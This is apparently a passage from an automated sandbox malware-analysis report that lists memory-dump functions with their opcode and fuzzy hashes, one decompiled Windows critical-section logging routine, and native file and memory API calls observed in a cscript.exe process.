API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a6aacd16fa35c99e18ae5fb3ce5d5716cdd8c1978bb3395f2b70a624b8157637
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 58D0E935352980CFE717CB1DC958B1577A4BB44B44FC50590E501CB762E62CE944CA00

Uniqueness

Uniqueness Score: -1.00%

Function 013BA537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: e282f1602512f94d5a50447b9776337dade01d895da41e65054639572fcfff02
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: F7C01232080288BBCB126E86CC00F06BB2AEBA4B60F008010BA080A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 0133DB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 51a574e3f7c39ce50ba745638f82b3646e3335ed1e0089d7df36477816955e83
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F2C08C30280A01AAEB2A1F24CD01F003AA1BB50F49F8400A06701DA0F0EB7CD801E610

Uniqueness

Uniqueness Score: -1.00%

Function 0133AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: b45aeeafc90bcb423abfe7966726fb273b3b75bae18fd4aa52ec091a62ba2e72
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 2BC02B330C0248BBC7126F49DD00F117F2DE7A0F60F000020FA040B671C932EC61D588

Uniqueness

Uniqueness Score: -1.00%

Function 01353A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 03b5d9e3d5de7c9a181a483f6183a2a6ab814af7b9bf757e455ff0ee94089baf
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: CAC08C32080248BBC7126E45DC00F017B29E7A0B60F000020BA040A5608536ECA0D598

Uniqueness

Uniqueness Score: -1.00%

Function 013476E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: fe8c5e2ea5ca79388d7254b19389c22d764e7a72e2aa27ee6e91df91a89b4c54
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: A5C08C701411805BEB2A570CCE20F303A91AB08A1CF88019CEA01094A2C36CB803C208

Uniqueness

Uniqueness Score: -1.00%

Function 013636CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 15a119426286389b8b2ef73ed186b5a5ee86aef30ddaa4bb932d03071a79ddd5
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 40C02B70159440FBD7191F34CD40F147258F700E35F6403547321454F0E52C9C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 01357D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: aac5274e6bfe9c0a5107e1b6090364d5773c200dd57201ab31858f083dee5feb
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 20B092353019408FCF66DF18C080F1533E4BB44A84B8400D0E800CBA21D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01362ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 22e3173371158c3a011306272e1131c52eee7daa03ed2cf7d3ee1e3d13188c05
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 50B01232C10841CFCF02EF84C610B197371FB00750F0544A0900127A30C22CBC01DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0137AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe3ade0be498143321920f6db1a7ff419cbce099dc54d8721e818c7dece3af9
Instruction ID: 7d789ce04cf91417d5462444720352afb34e8955e46e7baaff08e52da1c41671
Opcode Fuzzy Hash: bfe3ade0be498143321920f6db1a7ff419cbce099dc54d8721e818c7dece3af9
Instruction Fuzzy Hash: F2900275A0510012D94072998814A465016B7E0785B55C021E0504558CC9948A5963E1

Uniqueness

Uniqueness Score: -1.00%

Function 01379520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cebd4ef604c50895a0dfd874d728573651d2e182e0ddd9d0066f8ef4965acfe
Instruction ID: e87c04664106a92fee401558cfa2cd9629b5db0953361aaa8e84065ddf407aff
Opcode Fuzzy Hash: 7cebd4ef604c50895a0dfd874d728573651d2e182e0ddd9d0066f8ef4965acfe
Instruction Fuzzy Hash: CC9002E5201240928D00B399C404F0A5515A7E0245B51C026E1044564CC5658855A175

Uniqueness

Uniqueness Score: -1.00%

Function 01379560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b11545e75692ebc58bac708e9924aeabe8171f3455c1ef0efe90870f7438650
Instruction ID: 9175841c924f8f4030789bcc323009e9e0f2f158f86abcae4017995da3afb597
Opcode Fuzzy Hash: 5b11545e75692ebc58bac708e9924aeabe8171f3455c1ef0efe90870f7438650
Instruction Fuzzy Hash: 4D900269221100024945B699460490B1455B7D6395391C025F1406594CC66188696361

Uniqueness

Uniqueness Score: -1.00%

Function 01379950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db22b8d12c6a24cd47893ace070d8732d75277c73fef7105d5a7e09118f904a
Instruction ID: aaf92e6f0fae62eba61f83dce6eeca1cfa536954be698f8a1014a25ba3a64266
Opcode Fuzzy Hash: 1db22b8d12c6a24cd47893ace070d8732d75277c73fef7105d5a7e09118f904a
Instruction Fuzzy Hash: F09002A520150403D94076998804A071015A7D0346F51C021E2054559ECA698C557175

Uniqueness

Uniqueness Score: -1.00%

Function 013795F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a25f24775336b1f4be4c5fd14508cf2244c8854d586533db8d0ae357adcbc3
Instruction ID: cf5ab9168130d19ab3c68c0691d1f78f92ffe54d0c124b3a18d816b775647c3d
Opcode Fuzzy Hash: b8a25f24775336b1f4be4c5fd14508cf2244c8854d586533db8d0ae357adcbc3
Instruction Fuzzy Hash: 1B90027520110802D90472998804A861015A7D0345F51C021E6014659ED6A588957171

Uniqueness

Uniqueness Score: -1.00%

Function 013799D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df2c83d69f6158dc0f127e506116e8aeb593e76ff192f6971d05a8d6ebfad48
Instruction ID: fa976ef7eb51c138bf4d37c7128109527b712cdbb6771879a4f9c54896d13bd9
Opcode Fuzzy Hash: 9df2c83d69f6158dc0f127e506116e8aeb593e76ff192f6971d05a8d6ebfad48
Instruction Fuzzy Hash: 6C9002A521110042D90472998404B061055A7E1245F51C022E2144558CC5698C656165

Uniqueness

Uniqueness Score: -1.00%

Function 01379820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d302515436eea21341ee20a780ed63eb13737172b072f6ff61a4e95a630947
Instruction ID: c95a8ed6a727be3df82daf30975a081ff3f33cdad5c9db072b6b43c9a56cb722
Opcode Fuzzy Hash: 26d302515436eea21341ee20a780ed63eb13737172b072f6ff61a4e95a630947
Instruction Fuzzy Hash: 1B90027524110402D94172998404A061019B7D0285F91C022E0414558EC6958A5ABAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0137B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaacb695c2f5f5f945e6e7177e8bded4d6dc4546b31159c5ad6ef90b00f1c383
Instruction ID: 42930418a97c05afc40299711ed03831742daef82713ba0481c98153947b2bde
Opcode Fuzzy Hash: eaacb695c2f5f5f945e6e7177e8bded4d6dc4546b31159c5ad6ef90b00f1c383
Instruction Fuzzy Hash: 0F9002A5601240438D40B29988048066025B7E1345391C131E0444564CC6A88859A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 013798A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d014b149341d26aca5429a27387319bf8998ec1018cf2339126f4c78fe8d5ea
Instruction ID: 0fffb497f5c7f11921ff693a2b0a3e482d141961bc3792fb9f3559e0971e36d3
Opcode Fuzzy Hash: 9d014b149341d26aca5429a27387319bf8998ec1018cf2339126f4c78fe8d5ea
Instruction Fuzzy Hash: 9C90026530110402D90272998414A061019E7D1389F91C022E1414559DC6658957B172

Uniqueness

Uniqueness Score: -1.00%

Function 01379730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe13d3cfb9cd1a6626eb4c12f8cef876f0f5449ac53eb931ce3f26198431776
Instruction ID: 347a1b40fbda0c81a06ba4c2cfbae8118897f8a7535e183fe12a7d3531c4e524
Opcode Fuzzy Hash: 7fe13d3cfb9cd1a6626eb4c12f8cef876f0f5449ac53eb931ce3f26198431776
Instruction Fuzzy Hash: E990026560510402D94072999418B061025A7D0245F51D021E0014558DC6998A5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 0137A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d389ceda9cb2ee684fad0d03d6306147b6b0113b6cef0674d032706fff6b8fd2
Instruction ID: b4995e36a6bcb66204fda082ab5b482bcb257b256d49fcf43260640d736ad6cf
Opcode Fuzzy Hash: d389ceda9cb2ee684fad0d03d6306147b6b0113b6cef0674d032706fff6b8fd2
Instruction Fuzzy Hash: 7B90027530110052DD00B7D99804E4A5115A7F0345B51D025E4004558CC59488656161

Uniqueness

Uniqueness Score: -1.00%

Function 01379B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fd681d3fe395ad07008198c0b1bbfb94c79831c6e291ce49353bc64a22d8e9
Instruction ID: fbd53c225a96eecdd2e90cc78d76b826f2bb3080a78f8fcf1fc7f83d7c63102a
Opcode Fuzzy Hash: b2fd681d3fe395ad07008198c0b1bbfb94c79831c6e291ce49353bc64a22d8e9
Instruction Fuzzy Hash: 1A90026524110802D9407299C414B071016E7D0645F51C021E0014558DC656896976F1

Uniqueness

Uniqueness Score: -1.00%

Function 01379770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8c828028511cc087a0fa4354306398505fca047ee1fe6b7969bd528062a4ea
Instruction ID: e66f476abc86d202531af373957befb739eb379fcc811b060d858191fd896bfe
Opcode Fuzzy Hash: fd8c828028511cc087a0fa4354306398505fca047ee1fe6b7969bd528062a4ea
Instruction Fuzzy Hash: AA90026520514442D90076999408E061015A7D0249F51D021E1054599DC6758855B171

Uniqueness

Uniqueness Score: -1.00%

Function 0137A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9edd0e689b3ec61556f21638a7e78be5e3217e570078ff0c3356e04563a11bb8
Instruction ID: a79977da13a6037ad87a247554067666aa9cbc519116eced5389b5511930c8d0
Opcode Fuzzy Hash: 9edd0e689b3ec61556f21638a7e78be5e3217e570078ff0c3356e04563a11bb8
Instruction Fuzzy Hash: 7290027920514442DD0076999804E871015A7D0349F51D421E041459CDC6948865B161

Uniqueness

Uniqueness Score: -1.00%

Function 01379760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5b5b99d784559044afb80c1fad68f5132e732f124beee9b9aebdc2244e3885
Instruction ID: f265e46e783dc9ebce1a9d53de1065f67a8ac3d53798df3915246e4cf366931d
Opcode Fuzzy Hash: 7a5b5b99d784559044afb80c1fad68f5132e732f124beee9b9aebdc2244e3885
Instruction Fuzzy Hash: CA90027520110403D90072999508B071015A7D0245F51D421E041455CDD69688557161

Uniqueness

Uniqueness Score: -1.00%

Function 0137A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c4f9c335a1d04e225b184fe73942f85bc2122b5bf4865ce2822282526c1376
Instruction ID: d3b10acf8aa626da41dca4889dbd8ba4e66e1612d2d8a6a9317e0f23a164d9fe
Opcode Fuzzy Hash: 43c4f9c335a1d04e225b184fe73942f85bc2122b5bf4865ce2822282526c1376
Instruction Fuzzy Hash: 1490027520154002D9407299C444A0B6015B7E0345F51C421E0415558CC655885AA261

Uniqueness

Uniqueness Score: -1.00%

Function 01379FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4105b8b865c6f8b0bf191fd05973cf6939441c7347cc2ae0c8990fa1f0b9797a
Instruction ID: 7a763841ebcc0a00645075a9181f2557ee32fb8795c81da819b7f83aa955703f
Opcode Fuzzy Hash: 4105b8b865c6f8b0bf191fd05973cf6939441c7347cc2ae0c8990fa1f0b9797a
Instruction Fuzzy Hash: 6B90027531124402D9107299C404B061015A7D1245F51C421E081455CDC6D588957162

Uniqueness

Uniqueness Score: -1.00%

Function 01379610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418cb05d7ceecf29605d56f4e05c9a97580dc06da3494f1fa880069ba7e6747d
Instruction ID: cedf897976df2b96e93de57be0cac515bbc9913cfd22a69985419745e2127a64
Opcode Fuzzy Hash: 418cb05d7ceecf29605d56f4e05c9a97580dc06da3494f1fa880069ba7e6747d
Instruction Fuzzy Hash: CD90027560510802D95072998414B461015A7D0345F51C021E0014658DC7958A5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01379A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbb8dc09025f32587210f62c9933451ab0d52085ef971690142d8f466c423dd
Instruction ID: c4229d4ebff5093b1beb4c2f18ac824c4d1a8f9daf345971e645289a0038900d
Opcode Fuzzy Hash: bdbb8dc09025f32587210f62c9933451ab0d52085ef971690142d8f466c423dd
Instruction Fuzzy Hash: EE90027520150402D90072998808B471015A7D0346F51C021E5154559EC6A5C8957571

Uniqueness

Uniqueness Score: -1.00%

Function 01379650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb70faa532bb5154ce558610800edfdf6672fddac4e6b4a22a462be7881e43af
Instruction ID: a644025388a6be67c0a7baf05eb3bb2d55b2673292fdefe2be9d6dfc31c738e9
Opcode Fuzzy Hash: eb70faa532bb5154ce558610800edfdf6672fddac4e6b4a22a462be7881e43af
Instruction Fuzzy Hash: B690027520514842D94072998404E461025A7D0349F51C021E0054698DD6658D59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01379A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b0f38a2908e60a5078f115a8cad13ff1ca8f4fe6d55aab510065cd08ed86e2
Instruction ID: 6f1bfa0bf3e5d486ede0e4fe3ead028727f31f9a1196d92d24a02ad12fb0172d
Opcode Fuzzy Hash: 71b0f38a2908e60a5078f115a8cad13ff1ca8f4fe6d55aab510065cd08ed86e2
Instruction Fuzzy Hash: 0690026520154442D94073998804F0F5115A7E1246F91C029E4146558CC95588596761

Uniqueness

Uniqueness Score: -1.00%

Function 013796D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e723fa408e6ae935701c308e5371f42d29f5455498f11723093533544f28fbaf
Instruction ID: b55cedd3082464443b6a65524cd73a3b1b03117e4f7cec25c0ffd56b7e6223b2
Opcode Fuzzy Hash: e723fa408e6ae935701c308e5371f42d29f5455498f11723093533544f28fbaf
Instruction Fuzzy Hash: D090027520110842D90072998404F461015A7E0345F51C026E0114658DC655C8557561

Uniqueness

Uniqueness Score: -1.00%

Function 01379670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: af6254b9d761d4f45e4ac84573d08e6d75b9810bce06ac038920af6eaa294922
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 013CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E013CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0137CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E013C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E013C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x013cfdda
0x013cfde2
0x013cfde5
0x013cfdec
0x013cfdfa
0x013cfdff
0x013cfe0a
0x013cfe0f
0x013cfe17
0x013cfe1e
0x013cfe19
0x013cfe19
0x013cfe19
0x013cfe20
0x013cfe21
0x013cfe22
0x013cfe25
0x013cfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013CFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013CFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013CFE2B

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 448efefb90e8d3c1fb6e034d811817df5bde48bca0b47ffff91a6df7c83c505d
Instruction ID: eff577e40c96e4fd0a230a920d0822555f30b5d4de39f987615eee1cd23887f4
Opcode Fuzzy Hash: 448efefb90e8d3c1fb6e034d811817df5bde48bca0b47ffff91a6df7c83c505d
Instruction Fuzzy Hash: 3FF0F632200202BFEA202A59DC06F23BF5EEB44B34F244318F628565E1DA62FC6087F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 3684 Parent PID: 3440 cscript.exeCOMMON

Executed Functions

Function 003E9D70, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,003E4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003E4B87,007A002E,00000000,00000060,00000000,00000000), ref: 003E9DBD

Strings

.z`, xrefs: 003E9DAD, 003E9DB8

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: f7b36b0f8f81bb99c9c496e1a4917ba8f19855004823533402ef172a95fe7034
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 5FF0BDB2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 003E9EA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M>,?,?,003E4D20,00000000,FFFFFFFF), ref: 003E9EC5

Strings

M>, xrefs: 003E9EBC, 003E9EC4

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M>
API String ID: 3535843008-1136309009
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: c59317c0309a1b285be095a3247199b85c1c75311f8ee32047186de8bff62afe
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 0ED012752002146BD710EB99CC45E97775CEF44750F154555BA585B242C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9E1A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,003E4A01,?,?,?,?,003E4A01,FFFFFFFF,?,BM>,?,00000000), ref: 003E9E65

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 71b93a165af5260ba4d9d3ae8f9b1035f46035e250e46d88138092ebe0a7c13d
Instruction ID: 7f6a07abcabcc0b732994765cf425637a37e14d516b19c61f0318918698722eb
Opcode Fuzzy Hash: 71b93a165af5260ba4d9d3ae8f9b1035f46035e250e46d88138092ebe0a7c13d
Instruction Fuzzy Hash: 8AF0F9B2200108AFCB14DF99DC90EEB77ADEF8C754F168648FA5D97251DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9E20, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,003E4A01,?,?,?,?,003E4A01,FFFFFFFF,?,BM>,?,00000000), ref: 003E9E65

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 32b3477939057f2ad3fede83c969e7431784c1a6e468577c056cc608f0447b63
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A4F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F168248BA1D97251D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9F50, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003E9F89

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: c06f7aa85733ae775bd44d372f7ac0b1c8446aabce2b8f68e9120fb1735cdb9d
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 1FF015B2200218ABCB14DF89CC81EAB77ADAF88750F118248BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 047D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

